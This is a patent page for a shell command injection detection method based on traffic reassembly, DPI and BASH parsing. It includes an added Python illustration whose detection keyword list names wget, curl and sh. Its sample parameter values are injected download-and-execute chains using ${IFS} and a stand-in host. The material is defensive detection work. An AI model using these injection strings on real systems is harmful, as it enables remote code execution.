CN115913655A - Shell command injection detection method based on flow analysis and semantic analysis - Google Patents


Info

Publication number
CN115913655A
Authority
CN
China
Prior art keywords
shell command
analysis
shell
plaintext data
command
Legal status
Granted
Application number
CN202211337335.3A
Other languages
Chinese (zh)
Other versions
CN115913655B (en)
Inventor
季启
朱东君
韩兰胜
付才
贺杰彦
Current Assignee
Huazhong University of Science and Technology
Original Assignee
Huazhong University of Science and Technology

Classifications

    • Y GENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
    • Y02 TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
    • Y02D CLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
    • Y02D30/00 Reducing energy consumption in communication networks
    • Y02D30/50 Reducing energy consumption in communication networks in wire-line communication networks, e.g. low power modes or reduced link rate

Landscapes

  • Data Exchanges In Wide-Area Networks (AREA)
  • Computer And Data Communications (AREA)

Abstract

The invention belongs to the field of network communication and relates to a Shell command injection detection method based on flow analysis and semantic analysis. The method comprises: collecting high-speed network traffic at a network interface and restoring it into complete HTTP or TCP network session data streams; performing deep packet inspection on each network session data stream to obtain the Payload plaintext data of HTTP or TCP; using a Shell command template library to match the positions at which Shell commands occur in the Payload plaintext data; performing lexical and syntactic analysis on the Payload plaintext data at each such position to generate an abstract syntax tree (AST) of the Shell command, in which each node holds the command information of one Shell command; and traversing every node of the abstract syntax tree, identifying all nodes that match a template in the Shell command template library, and taking the Shell commands corresponding to those nodes as the Shell commands present in the Payload plaintext data, which completes the injection detection. Using semantic analysis in this way greatly improves detection precision.

Description

Shell command injection detection method based on flow analysis and semantic analysis
Technical Field
The invention belongs to the field of network communication, and particularly relates to a Shell command injection detection method based on flow analysis and semantic analysis.
Background
Shell command injection is a common network attack technique: by sending a specific data packet to a service that has a defect, the attacker causes the target application to execute a Shell command of the attacker's choosing. Generally speaking, a normal HTTP packet should not contain a Shell command, so a packet that contains one, for example a command for download-and-execute, permission modification or acquisition of sensitive device information, can be judged abnormal.
At present, Shell command injection is mainly detected and defended against by applying Shell keyword filtering and rule matching to gateway traffic, client traffic or user-mode data in order to discover and intercept it. This approach has three weaknesses. First, it only matches strings that satisfy the rules and cannot guarantee that the Shell command syntax contained in the string is correct, so the false alarm rate is high. Second, regular expressions are difficult to write for command strings, so the exact Shell command content is difficult to extract. Third, only a single Shell command can be matched; a complete Shell command sequence cannot be extracted accurately, and the overall intention of the sequence is not analyzed.
Further improving the accuracy of Shell command injection detection is therefore a problem that the field needs to solve.
Disclosure of Invention
In view of the defects of the prior art and the need for improvement, the invention provides a Shell command injection detection method based on traffic analysis and semantic analysis, which aims to accurately identify Shell command injection in the HTTP/TCP data packets of network traffic and thereby reduce the probability of false alarms and missed reports.
To achieve the above object, according to one aspect of the invention, there is provided a Shell command injection detection method based on traffic analysis and semantic analysis, comprising:
collecting high-speed network traffic at a network interface, and restoring the traffic that is dispersed over time in the collected data into complete HTTP or TCP network session data streams; performing deep packet inspection on each network session data stream to obtain the Payload plaintext data of HTTP or TCP;
matching the positions at which Shell commands occur in the Payload plaintext data using a Shell command template library; performing lexical and syntactic analysis on the Payload plaintext data at each such position to generate an abstract syntax tree of the Shell command, in which each node holds the command information of one Shell command;
and traversing every node of the abstract syntax tree, identifying all nodes that match a template in the Shell command template library, and taking the Shell commands corresponding to those nodes as the Shell commands present in the Payload plaintext data, which completes the injection detection.
Further, the method also comprises: determining the attack intention of each Shell command in the Payload plaintext data based on the node information.
Further, the method also comprises: determining, from the Shell command template library, the danger level of the Shell command corresponding to each identified node.
Further, when traversing the nodes of the abstract syntax tree, the method also comprises: determining the danger level of the abstract syntax tree as a whole using an attack state transition recognition method.
Further, the method also comprises: storing the Payload plaintext data in a MongoDB database.
Further, before matching the positions at which Shell commands occur in the Payload plaintext data, the method also comprises:
filtering noise characters out of the Payload plaintext data: URL-decoding the Payload plaintext data, and filtering and replacing special characters in the Payload plaintext data and special tokens of the BASH grammar.
Further, the Shell commands detected in the Payload plaintext data, together with their attack intention, danger level and position of occurrence, are stored in a database for later query.
Further, the syntactic analysis is performed with a parser generator that has a fault-tolerance mechanism, the parser generator containing error recovery rules;
parsing the Payload plaintext data then generates multiple abstract syntax trees (ASTs), which together contain all Shell commands in the Payload plaintext data.
The invention also provides a computer-readable storage medium comprising a stored computer program, wherein the computer program, when executed by a processor, controls the device on which the storage medium is located to execute the Shell command injection detection method based on traffic analysis and semantic analysis described above.
Generally, by the above technical solution conceived by the present invention, the following beneficial effects can be obtained:
(1) For Shell command injection attacks in network traffic, the invention provides a method, based on traffic analysis and semantic analysis, for discovering, locating and extracting Shell attack statements.
(2) The method can also analyze the attack intention and danger level of each extracted Shell command, and the danger level of the abstract syntax tree as a whole, which yields multidimensional information about the injection and allows Shell command injection to be analyzed from several angles.
(3) The invention introduces a fault-tolerance mechanism when the abstract syntax tree is built by lexical and syntactic analysis. Without it, an error would stop the traversal of the Shell commands that follow, and the resulting incomplete traversal would reduce detection reliability.
Drawings
Fig. 1 is a flow chart of a Shell command injection detection method based on traffic analysis and semantic analysis according to an embodiment of the present invention;
Fig. 2 is a state transition diagram of an attack statement based on an abstract syntax tree in semantic analysis according to an embodiment of the present invention;
Fig. 3 is a flow chart of another Shell command injection detection method according to an embodiment of the present invention;
Fig. 4 is a block diagram of the structure of a Shell command injection detection system based on traffic analysis and semantic analysis according to an embodiment of the present invention.
Detailed Description
In order to make the objects, technical solutions and advantages of the present invention more apparent, the present invention is further described in detail below with reference to the accompanying drawings and embodiments. It should be understood that the specific embodiments described herein are merely illustrative of the invention and are not intended to limit the invention. In addition, the technical features involved in the embodiments of the present invention described below may be combined with each other as long as they do not conflict with each other.
Example one
A Shell command injection detection method based on traffic analysis and semantic analysis, as shown in Fig. 1, includes:
collecting high-speed network traffic at a network interface, and restoring the traffic that is dispersed over time in the collected data into complete HTTP or TCP network session data streams; performing deep packet inspection on each network session data stream to obtain the Payload plaintext data of HTTP or TCP;
matching the positions at which Shell commands occur in the Payload plaintext data using a Shell command template library; performing lexical and syntactic analysis on the Payload plaintext data at each such position to generate an abstract syntax tree of the Shell command, in which each node holds the command information of one Shell command;
and traversing every node of the abstract syntax tree, identifying all nodes that match a template in the Shell command template library, and taking the Shell commands corresponding to those nodes as the Shell commands present in the Payload plaintext data, which completes the injection detection.
The method uses semantic analysis to determine from the traffic data both whether a Shell command has been injected and what the specific Shell command statement is, which greatly improves detection precision.
Preferably, the method further comprises: determining the attack intention of each Shell command in the Payload plaintext data based on the node information.
Preferably, the method further comprises: determining, from the Shell command template library, the danger level of the Shell command corresponding to each identified node.
Preferably, when traversing the nodes of the abstract syntax tree, the method further includes: determining the danger level of the abstract syntax tree using an attack state transition recognition method, as shown in Fig. 2.
That is, the basic flow of the Shell command injection detection method based on traffic analysis and semantic analysis is as follows. First, traffic is collected and packets are reassembled: DPDK can be used to capture the traffic passing through a network card, and the TCP data in that traffic is reassembled to restore complete TCP flow data. Then deep packet inspection is performed on the traffic, and the plaintext TCP Payload and HTTP Payload in HTTP/TCP are extracted and stored in a database. Finally, analysis operations such as Shell command detection, attack statement extraction, semantic recognition and attack intention recognition are carried out on the plaintext traffic information obtained.
Specifically, as shown in Fig. 3:
(1) Network traffic collection: a DPDK traffic collection algorithm collects high-speed network traffic at a network interface, and network traffic data suspected of containing a Shell command is collected as the original traffic.
(2) Restoring the network session data stream: a TCP flow reassembly method restores the traffic that is dispersed over time in the original traffic into complete HTTP/TCP network session data streams (used for Payload plaintext data extraction).
(3) Payload plaintext data: deep packet inspection (DPI) is performed on the network session data stream according to the standard network protocol formats, the Payload plaintext data of the HTTP/TCP load is parsed out, and it is stored in a MongoDB database by protocol field.
(4) Locating Shell attack commands by regular-expression matching: a Shell command template library is constructed and used to match the positions at which Shell commands occur in the Payload plaintext data.
(5) Shell command syntactic/lexical analysis based on the BASH grammar: Shell attack statements are extracted from the Payload plaintext data at the matched positions. Lexical analysis uses the Flex tool, which reads and segments the input character string and returns keywords, operators, ordinary words and so on. Syntactic analysis uses the parser generator Bison, which applies bottom-up LALR parsing to the qualifying words extracted by lexical analysis.
(6) Each node of the abstract syntax tree is traversed and checked in order to analyze the semantics and attack intention of the Shell command.
(7) The Shell attack statement, the attack intention, the danger rating result and the position of the attack statement are written to a database for later query.
Preferably, the method further comprises: storing the Payload plaintext data in a MongoDB database so that command injection analysis and detection can be run on it again later.
Preferably, before matching the positions at which Shell commands occur in the Payload plaintext data, the method further includes: filtering out the large number of noise characters present in the extracted HTTP/TCP plaintext Payload, which comprises URL-decoding the Payload plaintext data and filtering and replacing special characters in the Payload plaintext data and special tokens of the BASH grammar.
Preferably, the syntactic analysis is performed with an improved version of the parser generator Bison that has a fault-tolerance mechanism. Parsing the Payload plaintext data then generates a plurality of abstract syntax trees (ASTs) that together contain all Shell commands in the Payload plaintext data, which further improves detection precision and avoids missed reports.
In this embodiment, the syntactic analysis is built on the syntax analysis module of the open-source BASH code, with two changes: first, more fault-tolerant processing and error recovery rules are added so that a more robust abstract syntax tree is generated; second, a memory leak in the error recovery stage of the syntax analysis is fixed.
Overall, the embodiment uses syntactic and semantic analysis. Checking that a shell command conforms to the grammar reduces the false alarm rate, and semantic analysis adds analysis dimensions so that information about the injected shell command is obtained from multiple angles. This addresses the low accuracy of existing methods that detect and intercept shell injection in network traffic.
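The steps above (noise filtering, keyword locating, parsing into command nodes, template matching and a state-transition rating) as an added Python example that is not code from the patent. Python's shlex stands in for the Flex/Bison BASH parser, the syntax tree is flattened to a list of command nodes, and the template library, danger levels, the download-to-execute state machine and the sample values are assumptions made for illustration.

```python
import re
import shlex
from dataclasses import dataclass
from urllib.parse import unquote_plus

# Hypothetical template library: command name -> (attack intent, danger level).
TEMPLATES = {
    "wget": ("download", 2), "curl": ("download", 2),
    "chmod": ("permission-change", 2),
    "sh": ("execute", 3), "bash": ("execute", 3),
    "uname": ("information-gathering", 1), "cat": ("information-gathering", 1),
}
LOCATOR = re.compile(r"\b(?:" + "|".join(TEMPLATES) + r")\b")  # cheap prefilter
SEPARATORS = {";", "&&", "||", "|", "&"}
CHAIN_LEVEL = 4  # assumed rating for a completed download -> execute sequence


@dataclass
class Node:
    """One simple command of the parsed statement."""
    name: str
    args: list
    intent: str = ""
    level: int = 0


def preprocess(value: str) -> str:
    """URL-decode ('+' becomes a space), then replace the ${IFS} separator."""
    return re.sub(r"\$\{IFS\}|\$IFS\b", " ", unquote_plus(value))


def tokenize(text: str) -> list:
    """Shell-like tokens; on a quoting error, re-lex with quotes as plain text."""
    for quotes in ("'\"", ""):
        lex = shlex.shlex(text, posix=True, punctuation_chars=True)
        lex.whitespace_split = True
        lex.commenters = ""
        lex.quotes = quotes
        try:
            return list(lex)
        except ValueError:  # e.g. "No closing quotation": recover and retry
            continue
    return []


def parse(text: str) -> list:
    """Split the token stream into command nodes at control operators."""
    nodes, current = [], []
    for tok in tokenize(text) + [";"]:
        if tok in SEPARATORS:
            if current:
                nodes.append(Node(current[0], current[1:]))
            current = []
        else:
            current.append(tok)
    return nodes


def analyse(value: str):
    """Return (nodes matching the library, danger level of the sequence)."""
    text = preprocess(value)
    if LOCATOR.search(text) is None:  # no template keyword: skip parsing
        return [], 0
    matched, written, state = [], set(), "start"
    for node in parse(text):
        base = node.name.rsplit("/", 1)[-1]
        if node.name in written:  # runs a file an earlier node fetched or chmod-ed
            node.intent, node.level = "execute", 3
        elif base in TEMPLATES:
            node.intent, node.level = TEMPLATES[base]
        else:
            continue  # keyword is not in command position: not a command
        matched.append(node)
        if node.intent in ("download", "permission-change"):
            written.update(a for a in node.args if not a.startswith("-"))
        # Assumed state machine: start -> downloaded -> executed
        if node.intent == "download":
            state = "downloaded"
        elif node.intent == "execute" and state == "downloaded":
            state = "executed"
    if state == "executed":
        return matched, CHAIN_LEVEL
    return matched, max((n.level for n in matched), default=0)


# Constructed parameter values, as they might look after DPI field extraction.
SAMPLES = {
    "chain": "127.0.0.1;wget${IFS}http://example.invalid/a+-O+/tmp/a;"
             "chmod+%2Bx+/tmp/a;/tmp/a",
    "prose": "how+to+use+wget+behind+a+proxy",
    "stray-quote": "x';curl http://example.invalid/b -o /tmp/b;sh /tmp/b",
    "recon": "8.8.8.8;uname+-a",
}

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        nodes, level = analyse(value)
        print(label, level, [(n.name, n.intent) for n in nodes])
```

The "prose" sample contains the keyword wget but yields no command node, which is the false alarm that keyword matching alone would raise. A value whose stray quotes happen to balance is lexed here as one quoted word and yields no command nodes, so a production parser also has to consider the unquoted reading.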
To better illustrate the invention, a detection system is provided, as shown in Fig. 4. It includes a network data collection and processing unit 100, a preprocessing unit 200, a syntax/lexical analysis unit 300, and a semantic and attack intention output unit 400, which interact in sequence.
The working mechanism is as follows. The network data collection and processing unit 100 collects network traffic data that may contain a Shell command and, after the data has been parsed by the data packet parsing module 120, stores the plaintext Payload data in the database 130. The preprocessing unit 200 reads HTTP/TCP plaintext data from the database 130 into the URL decoding module 210 for URL decoding and passes the result to the noise character filtering module 220, which filters out special characters. The Shell command positioning module 240 receives the outputs of the Shell command configuration module 230 and the noise character filtering module 220, and outputs the character string to be semantically analyzed to the syntax/lexical analysis unit 300. The syntax analysis module 310 invokes the lexical analysis module 320 to segment the input character string into tokens and finally generates an abstract syntax tree, which is passed to the semantic and attack intention output unit 400. The semantic analysis module 420 traverses the abstract syntax tree, and the attack intention analysis module 410 determines the intention of the attack statement, generates a danger level, and produces the output 430.
Specifically, the network data collection and processing unit 100 includes a network traffic collection module 110, a data packet parsing module 120, and a database 130, which interact in sequence.
The network traffic collection module 110 is any hardware or software capable of collecting network traffic, such as a router, a switch, a hub, or network data collection software; its function is to collect network traffic. The module uses DPDK traffic collection to capture high-speed network traffic at a network interface, collects network traffic data that may contain Shell commands, and provides the data to the data packet parsing module for parsing. The data packet parsing module 120 is a program capable of parsing HTTP/TCP protocol packets. It performs TCP flow reassembly on the collected traffic data, performs deep packet inspection (DPI) on the reassembled TCP flow data according to the standard network protocol formats, parses out the Payload plaintext data of the HTTP/TCP load, and writes it to the database, from which it is provided to the Shell command semantic and syntactic analysis for detection. The database 130 stores the Payload plaintext data parsed from the HTTP/TCP load; it is generally a MongoDB database, and its function is to store the plaintext contents of the parsed packets.
The preprocessing unit 200 includes a URL decoding module 210, a noise character filtering module 220, a Shell command configuration module 230, and a Shell command location module 240.
The URL decoding module 210 is a program that URL-decodes an input character string, for example decoding "%20"; its purpose is to prevent a Shell command embedded in a URL from bypassing detection through encoding. The noise character filtering module 220 is a program that filters and replaces certain special characters in the Payload and certain special tokens of the BASH grammar; it replaces special substrings in the input string, such as the "${IFS}" environment variable and the "+" in a URL. The Shell command configuration module 230 is a file for configuring Shell commands; it configures the Shell commands that need semantic analysis in addition to the common download-and-execute and permission-modification commands. The Shell command positioning module 240 is a program that performs regular-expression matching. It matches the input data against the Shell command configuration module 230 and the Shell command keywords of the BASH grammar, and finds the positions in the HTTP/TCP Payload at which Shell commands requiring semantic analysis occur, which reduces the scope and overhead of the semantic analysis.
The syntax/lexical analysis unit 300 includes two cooperating modules, a syntax analysis module 310 and a lexical analysis module 320. The syntax analysis module 310 is a program that parses an input string according to the syntax rules of Shell commands to generate an abstract syntax tree; it calls the lexical analysis module 320 to perform word segmentation. The lexical analysis module 320 is a program that segments input character strings: when called by the syntax analysis module 310, it takes the current character string as input, outputs the words that satisfy the lexical rules, and returns them to the syntax analysis module 310.
The semantic and attack intention output unit 400 includes an attack intention analysis module 410, a semantic analysis module 420, and an output module 430.
The attack intention analysis module 410 is a program for analyzing attack intention. It matches the extracted attack command against an attack command template library of malicious commands and, combining this with the attack command identified by the semantic analysis module 420, identifies the attack intention of the extracted command. The semantic analysis module 420 is a program for performing semantic analysis. It traverses the abstract syntax tree generated by the syntax analysis module 310 and identifies attack commands; the attack modes to be identified include Shell attack commands such as download-and-execute, permission modification and configuration file changes. The output module 430 is a database for storing analysis results. It stores the results of the semantic and attack intention analysis, including the Shell attack statement, the attack intention, the danger rating result and the position of the attack statement, so that they can be queried.
In conclusion, the embodiment provides a method, based on traffic analysis and semantic analysis, for discovering, locating and extracting Shell attack statements and for recognizing attack intention semantically. The method has a degree of input fault tolerance: error recovery is added to the syntactic analysis, and malformed Shell commands that do not conform to the Shell grammar rules are eliminated. The detection system can be implemented in C, occupies little memory and runs efficiently.
Example two
A computer-readable storage medium comprising a stored computer program, wherein the computer program, when executed by a processor, controls the device on which the storage medium is located to execute the Shell command injection detection method based on traffic analysis and semantic analysis described above.
The related technical solution is the same as in the first embodiment and is not described again here.
Those skilled in the art will understand that the foregoing is only an exemplary embodiment of the present invention and is not intended to limit the invention to the particular forms disclosed; modifications, substitutions and improvements made within the spirit and scope of the invention fall within the scope of the appended claims.

Claims (8)

1. A Shell command injection detection method based on flow analysis and semantic analysis, characterized by comprising the following steps:
collecting high-speed network traffic at a network interface, and restoring the traffic that is dispersed over time in the collected data into complete HTTP or TCP network session data streams; performing deep packet inspection on each network session data stream to obtain the Payload plaintext data of HTTP or TCP;
matching the positions at which all Shell commands occur in the Payload plaintext data using a Shell command template library; performing lexical and syntactic analysis on the Payload plaintext data at each such position to generate an abstract syntax tree of the Shell command, in which each node holds the command information of one Shell command;
and traversing every node of the abstract syntax tree, identifying all nodes that match a template in the Shell command template library, and taking the Shell commands corresponding to those nodes as the Shell commands present in the Payload plaintext data, which completes the injection detection of the Shell command.
2. The Shell command injection detection method of claim 1, further comprising: determining the attack intention of each Shell command in the Payload plaintext data based on the node information.
3. The Shell command injection detection method of claim 1, further comprising:
determining, from the Shell command template library, the danger levels of the Shell commands corresponding to all the identified nodes.
4. The Shell command injection detection method of claim 1, wherein, when traversing the nodes of the abstract syntax tree, the method further comprises: determining the danger level of the abstract syntax tree using an attack state transition recognition method.
5. The method according to claim 1, wherein, before matching the positions at which Shell commands occur in the Payload plaintext data, the method further comprises:
filtering noise characters out of the Payload plaintext data, which comprises: URL-decoding the Payload plaintext data; and filtering and replacing special characters in the Payload plaintext data and special tokens of the BASH grammar.
6. The Shell command injection detection method of claim 1, further comprising: storing the Shell commands detected in the Payload plaintext data, together with their attack intention, danger level information and position of occurrence, in a database for query.
7. The Shell command injection detection method of any of claims 1 to 6, wherein the syntactic analysis is performed using a modified parser generator with a fault-tolerance mechanism, the parser generator containing error recovery rules;
when the Payload plaintext data is parsed, a plurality of abstract syntax trees (ASTs) are generated, which together include all Shell commands in the Payload plaintext data.
8. A computer-readable storage medium comprising a stored computer program, wherein the computer program, when executed by a processor, controls the device on which the storage medium is located to execute the Shell command injection detection method based on traffic analysis and semantic analysis according to any one of claims 1 to 7.
CN202211337335.3A 2022-10-28 2022-10-28 Shell command injection detection method based on flow analysis and semantic analysis Active CN115913655B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202211337335.3A CN115913655B (en) 2022-10-28 2022-10-28 Shell command injection detection method based on flow analysis and semantic analysis


Publications (2)

Publication Number Publication Date
CN115913655A (en) 2023-04-04
CN115913655B (en) 2024-05-14


Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant